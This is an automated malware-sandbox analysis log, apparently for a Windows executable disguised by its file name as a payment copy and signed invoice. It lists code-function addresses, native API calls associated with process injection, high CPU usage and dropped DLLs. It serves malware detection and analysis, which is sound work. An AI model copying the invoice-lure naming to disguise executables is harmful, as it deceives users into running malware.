Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F36FF 0_2_022F36FF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0AF8 0_2_022F0AF8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F12C9 0_2_022F12C9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3AC8 0_2_022F3AC8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F06C2 0_2_022F06C2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FC2C0 0_2_022FC2C0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F16DC 0_2_022F16DC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F2AD8 0_2_022F2AD8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAAD8 0_2_022FAAD8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5AD7 0_2_022F5AD7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F76D2 0_2_022F76D2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0329 0_2_022F0329
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9F22 0_2_022F9F22
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAF3D 0_2_022FAF3D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F630E 0_2_022F630E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9F1D 0_2_022F9F1D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA31B 0_2_022FA31B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0367 0_2_022F0367
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1366 0_2_022F1366
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAB65 0_2_022FAB65
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F577F 0_2_022F577F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAF77 0_2_022FAF77
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F174F 0_2_022F174F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4748 0_2_022F4748
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0B59 0_2_022F0B59
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBB56 0_2_022FBB56
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5F52 0_2_022F5F52
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6FA6 0_2_022F6FA6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0BA0 0_2_022F0BA0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3B83 0_2_022F3B83
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F279D 0_2_022F279D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9F96 0_2_022F9F96
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4794 0_2_022F4794
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F17E6 0_2_022F17E6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5FE3 0_2_022F5FE3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FABE2 0_2_022FABE2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F47FD 0_2_022F47FD
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F13FC 0_2_022F13FC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F27F0 0_2_022F27F0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F67CA 0_2_022F67CA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0BDF 0_2_022F0BDF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBBD1 0_2_022FBBD1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3C2D 0_2_022F3C2D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA02A 0_2_022FA02A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7023 0_2_022F7023
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC3B 0_2_022FBC3B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6C33 0_2_022F6C33
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F040A 0_2_022F040A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC07 0_2_022FBC07
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3416 0_2_022F3416
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5C15 0_2_022F5C15
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5813 0_2_022F5813
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAC6C 0_2_022FAC6C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAC6A 0_2_022FAC6A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1468 0_2_022F1468
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4863 0_2_022F4863
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0C60 0_2_022F0C60
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1872 0_2_022F1872
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F344B 0_2_022F344B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA84A 0_2_022FA84A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F04A3 0_2_022F04A3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCA0 0_2_022FBCA0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA0B6 0_2_022FA0B6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F608A 0_2_022F608A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3C9B 0_2_022F3C9B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0CEC 0_2_022F0CEC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F34E7 0_2_022F34E7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCE6 0_2_022FBCE6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F14FD 0_2_022F14FD
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F74F9 0_2_022F74F9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F50F5 0_2_022F50F5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4CCC 0_2_022F4CCC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F58CC 0_2_022F58CC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F2CD3 0_2_022F2CD3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5CD3 0_2_022F5CD3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1929 0_2_022F1929
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F4924 0_2_022F4924
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3535 0_2_022F3535
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3D33 0_2_022F3D33
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7531 0_2_022F7531
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5100 0_2_022F5100
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F611D 0_2_022F611D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA918 0_2_022FA918
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0D6D 0_2_022F0D6D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA973 0_2_022FA973
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F594D 0_2_022F594D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F555C 0_2_022F555C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA158 0_2_022FA158
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9951 0_2_022F9951
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F95AE 0_2_022F95AE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F51AB 0_2_022F51AB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F15A6 0_2_022F15A6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F75BF 0_2_022F75BF
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F69BA 0_2_022F69BA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F61B9 0_2_022F61B9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F518E 0_2_022F518E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9D8E 0_2_022F9D8E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F898A 0_2_022F898A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1989 0_2_022F1989
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9987 0_2_022F9987
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5D86 0_2_022F5D86
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3997 0_2_022F3997
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F35E9 0_2_022F35E9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3DE8 0_2_022F3DE8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA5E8 0_2_022FA5E8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA1E7 0_2_022FA1E7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9DE5 0_2_022F9DE5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F59E3 0_2_022F59E3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F55CA 0_2_022F55CA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F11C9 0_2_022F11C9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F39C4 0_2_022F39C4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA9D9 0_2_022FA9D9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9AB778 24_2_6E9AB778
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E992766 24_2_6E992766
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99F41F 24_2_6E99F41F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9B3112 24_2_6E9B3112
Contains functionality to call native functions
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7E91 NtWriteVirtualMemory,LdrInitializeThunk, 0_2_022F7E91
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6F7D NtAllocateVirtualMemory, 0_2_022F6F7D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB3C0 NtProtectVirtualMemory, 0_2_022FB3C0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F11C2 NtWriteVirtualMemory,TerminateProcess,LoadLibraryA, 0_2_022F11C2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB9D0 NtMapViewOfSection, 0_2_022FB9D0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5E24 NtWriteVirtualMemory, 0_2_022F5E24
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE21 NtMapViewOfSection, 0_2_022FBE21
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE33 NtMapViewOfSection, 0_2_022FBE33
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA02 NtMapViewOfSection, 0_2_022FBA02
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0E1E NtWriteVirtualMemory,LoadLibraryA, 0_2_022F0E1E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5A6E NtWriteVirtualMemory, 0_2_022F5A6E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE7C NtMapViewOfSection, 0_2_022FBE7C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA7B NtMapViewOfSection, 0_2_022FBA7B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5679 NtWriteVirtualMemory, 0_2_022F5679
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBAB9 NtMapViewOfSection, 0_2_022FBAB9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EB4 NtWriteVirtualMemory, 0_2_022F5EB4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F628C NtWriteVirtualMemory, 0_2_022F628C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBE8A NtMapViewOfSection, 0_2_022FBE8A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EEB NtWriteVirtualMemory, 0_2_022F5EEB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBEE5 NtMapViewOfSection, 0_2_022FBEE5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5AD7 NtWriteVirtualMemory, 0_2_022F5AD7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBED7 NtMapViewOfSection, 0_2_022FBED7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F630E NtWriteVirtualMemory, 0_2_022F630E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBF03 NtMapViewOfSection, 0_2_022FBF03
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F577F NtWriteVirtualMemory, 0_2_022F577F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBB56 NtMapViewOfSection, 0_2_022FBB56
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5F52 NtWriteVirtualMemory, 0_2_022F5F52
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB3AA NtProtectVirtualMemory, 0_2_022FB3AA
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6FA6 NtAllocateVirtualMemory, 0_2_022F6FA6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBFB9 NtMapViewOfSection, 0_2_022FBFB9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5FE3 NtWriteVirtualMemory, 0_2_022F5FE3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB3F8 NtProtectVirtualMemory, 0_2_022FB3F8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F63CC NtWriteVirtualMemory, 0_2_022F63CC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBBD1 NtMapViewOfSection, 0_2_022FBBD1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7023 NtAllocateVirtualMemory, 0_2_022F7023
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC3B NtMapViewOfSection, 0_2_022FBC3B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBC07 NtMapViewOfSection, 0_2_022FBC07
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3416 NtWriteVirtualMemory,LoadLibraryA, 0_2_022F3416
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5C15 NtWriteVirtualMemory, 0_2_022F5C15
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5813 NtWriteVirtualMemory, 0_2_022F5813
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F70A6 NtAllocateVirtualMemory, 0_2_022F70A6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCA0 NtMapViewOfSection, 0_2_022FBCA0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F608A NtWriteVirtualMemory, 0_2_022F608A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6484 NtWriteVirtualMemory, 0_2_022F6484
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBCE6 NtMapViewOfSection, 0_2_022FBCE6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F58CC NtWriteVirtualMemory, 0_2_022F58CC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB8C8 NtProtectVirtualMemory, 0_2_022FB8C8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F70DB NtAllocateVirtualMemory, 0_2_022F70DB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5CD3 NtWriteVirtualMemory, 0_2_022F5CD3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F611D NtWriteVirtualMemory, 0_2_022F611D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F594D NtWriteVirtualMemory, 0_2_022F594D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F555C NtWriteVirtualMemory, 0_2_022F555C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBDA1 NtMapViewOfSection, 0_2_022FBDA1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F61B9 NtWriteVirtualMemory, 0_2_022F61B9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9D8E NtWriteVirtualMemory, 0_2_022F9D8E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5D86 NtWriteVirtualMemory, 0_2_022F5D86
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA5E8 NtWriteVirtualMemory, 0_2_022FA5E8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F9DE5 NtWriteVirtualMemory, 0_2_022F9DE5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F59E3 NtWriteVirtualMemory, 0_2_022F59E3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBDF3 NtMapViewOfSection, 0_2_022FBDF3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F55CA NtWriteVirtualMemory, 0_2_022F55CA
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: api-ms-win-crt-private-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.24.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr Static PE information: No import functions for PE file found
